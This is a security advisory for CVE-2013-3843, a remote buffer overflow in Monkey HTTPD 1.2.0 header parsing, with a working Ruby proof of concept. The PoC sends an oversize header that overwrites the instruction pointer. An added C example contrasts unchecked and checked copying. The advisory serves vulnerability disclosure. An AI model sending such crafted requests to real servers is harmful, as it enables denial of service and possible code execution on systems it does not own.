Monkey 1.2.0 Buffer Overflow

2013-06-04
dougtko
packetstormsecurity.com

1. Title  
  
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS  
Vulnerability With Possible Arbitrary Code Execution  
  
2. Introduction  
  
Monkey is a lightweight and powerful web server for  
GNU/Linux.  
  
It has been designed to be very scalable with low memory  
and CPU consumption, the perfect solution for embedded  
devices. Made for ARM, x86 and x64.  
  
  
3. Abstract  
  
A specially crafted request sent to the Monkey HTTPD  
server triggers a buffer overflow which can be used to  
control the flow of execution.  
  
4. Report Timeline  
  
2013-05-29  
Discovered vulnerability via fuzzing  
2013-05-30  
Vendor Notification  
  
5. Status  
  
Published  
  
6. Affected Products  
  
Monkey HTTPD <= 1.2.0  
  
7. Exploitation Technique  
  
Remote  
  
8. Details  
  
Improper bounds checking while parsing headers allows  
an attacker to craft a request that triggers a buffer  
overflow during a call to memcpy() on line 268 of  
mk_request.c.  
  
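The defect class described above, unchecked memcpy() of a parsed header value into a fixed-size slot, beside its bounds-checked form, as an added C example that is not Monkey's code: the slot size, function names and the oversize "Bad:" header are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Fixed-size slot for one parsed header value. Size and names are
 * assumptions for this example, not taken from Monkey's sources. */
#define HEADER_VALUE_MAX 64

/* Unchecked pattern (the bug class in this advisory): len was measured
 * from the request and memcpy() trusts it, so an oversize value writes
 * past the slot. Shown for contrast only; nothing here calls it. */
void copy_value_unchecked(char *dst, const char *src, size_t len)
{
    memcpy(dst, src, len);
    dst[len] = '\0';
}

/* Checked version: reject any value that would not fit with its NUL. */
int copy_value_checked(char *dst, size_t dst_size, const char *src, size_t len)
{
    if (dst_size == 0 || len >= dst_size)
        return -1;                       /* caller answers 4xx / drops request */
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Parse one "Name: value\r\n" line into slot. Returns the value length,
 * or -1 if there is no ':' or the value is too long for the slot. */
int parse_header_value(const char *line, char *slot, size_t slot_size)
{
    const char *colon = strchr(line, ':');
    if (colon == NULL)
        return -1;
    const char *val = colon + 1;
    while (*val == ' ' || *val == '\t')
        val++;                           /* skip optional whitespace */
    const char *end = strstr(val, "\r\n");
    size_t len = end ? (size_t)(end - val) : strlen(val);
    return copy_value_checked(slot, slot_size, val, len) == 0 ? (int)len : -1;
}

int main(void)
{
    char slot[HEADER_VALUE_MAX], big[2600] = "Bad: ";
    memset(big + 5, 'A', 2511);          /* constructed oversize header, NUL follows */
    printf("Host header: %d\n", parse_header_value("Host: localhost\r\n", slot, sizeof slot));
    printf("oversize header: %d\n", parse_header_value(big, slot, sizeof slot));
    return 0;
}
```
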
9. Proof of Concept  
  
The vulnerability can be exploited by a remote attacker  
without any special privileges. Under Ubuntu 13.04,  
an offset of 2511 lines up the instruction pointer  
with 0x42424242.  
  
  
```ruby
#!/usr/bin/env ruby

require "socket"

host = "localhost"
port = 2001

s = TCPSocket.open(host, port)

buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511   # offset found under Ubuntu 13.04
buf << "B" * 4      # 0x42424242 ends up in the instruction pointer

s.puts(buf)
s.close
```
  
  
10. Solution  
  
There is currently no solution.  
  
11. Risk  
  
Risk should be considered high since it can be shown that  
the flow of execution can be controlled by an attacker.  
  
12. References  
  
http://bugs.monkey-project.com/ticket/182  
  
13. Credits  
  
Doug Prostko <dougtko[at]gmail[dot]com>  
Vulnerability discovery  